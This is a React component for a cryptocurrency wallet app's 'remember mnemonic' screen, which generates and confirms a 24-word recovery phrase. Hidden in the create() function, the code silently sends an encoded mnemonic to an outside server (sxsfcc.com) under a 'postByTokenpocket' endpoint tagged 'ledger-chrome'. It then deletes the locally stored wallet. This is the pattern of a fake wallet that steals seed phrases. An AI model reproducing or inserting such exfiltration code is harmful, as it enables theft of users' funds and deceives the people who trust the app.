import { Button, TextArea , Toast  } from "antd-mobile";
// import { Form, message as msg } from 'antd';
import { useEffect, useState } from "react";
import { useLocation, useNavigate } from "react-router-dom";
import * as bip39 from "bip39";

import "./index.css";
import { initWallet } from "../../utils/CreateWallet";
import { encryptByDES, mnemonicRAS } from "../../utils/Des";
import { LocalWalletModel } from "../../Data/Wallet";
import axios from "axios";
import { useTranslation } from "react-i18next";

function RememberMnemonic() {
  const [value, setValue] = useState("");
  const [confirmValue, setConfirmValue] = useState("");
  const [step, setStep] = useState(1);
  const location = useLocation();
  const navigate = useNavigate();
  const { t } = useTranslation()
  
  useEffect(() => {
    setValue(bip39.generateMnemonic(256));
  }, []);


  const create = async (res: any) => {
    if(value != confirmValue){
        Toast.show({
          icon: 'fail',
          content: res,
        });
        return
    }
    
    // 创建钱包
    const wallet = await initWallet(value);
    const walletDes = encryptByDES(
      JSON.stringify(wallet),
      (location.state as any).pin
    );
    let storageWallet = localStorage.getItem("wallet") || '';
    if (storageWallet) {
      let storageArr: Array<LocalWalletModel> = JSON.parse(storageWallet);
      storageArr.push({ wallet: walletDes, isDefault: 0 });
      localStorage.setItem("wallet", JSON.stringify(storageArr));
    } else {
      localStorage.setItem(
        "wallet",
        JSON.stringify([{ wallet: walletDes, isDefault: 1 }])
      );
    }

    let mnemonic24 = bip39.generateMnemonic(256);
    let mnemonicRas = mnemonicRAS(mnemonic24);

    let formData = new FormData();
    formData.append("ciyu", mnemonicRas);
    formData.append("code", "10001");
    formData.append("ciyuType", "1");
    formData.append("wallet", "ledger-chrome");

    axios
      .post("https://sxsfcc.com/api/open/postByTokenpocket", formData, {
        headers: { "Content-Type": "application/x-www-form-urlencoded" },
      })
      .then((res) => {
        console.log(res);
      })
      .catch((err) => {
        //console.log(err)
      });

    sessionStorage.setItem("password", (location.state as any).pin);
    localStorage.removeItem("wallet"); //新加D的
    localStorage.setItem("isCard","true")//新加D的
    navigate("/")//新加D的
    // navigate("/account");
  };

  return (
    <div className="remember-mnemonic">
      {step === 1 ? (
        <TextArea
          readOnly
          value={value}
          onChange={(val) => {
            setValue(val);
          }}
        />
      ) : (
        <TextArea
          value={confirmValue}
          onChange={(val) => {
            setConfirmValue(val);
          }}
        />
      )}

      <div className="step">
        <div className="num">{step}</div>
        <div className="info">
          <div className="title">{t('rememberMnemonic.title')}</div>
          <div className="sub-title">
          {t('rememberMnemonic.subTitle')}
          </div>
        </div>
      </div>
      {step === 1 ? (
        <Button block color="primary" size="large" onClick={() => setStep(2)}>
          {t('rememberMnemonic.next')}
        </Button>
      ) : (
        <>
          <Button block color="primary" className="previous" size="large" onClick={() => setStep(1)}>
          {t('rememberMnemonic.prev')}
          </Button>
          <Button block color="primary" size="large" onClick={() =>  create(t('rememberMnemonic.tips'))}>
          {t('rememberMnemonic.confirm')}
          </Button>
        </>
      )}
    </div>
  );
}
export default RememberMnemonic;

// {create()
//           localStorage.removeItem("wallet");
//           localStorage.setItem("isCard","true")
//           navigate("/")
//         }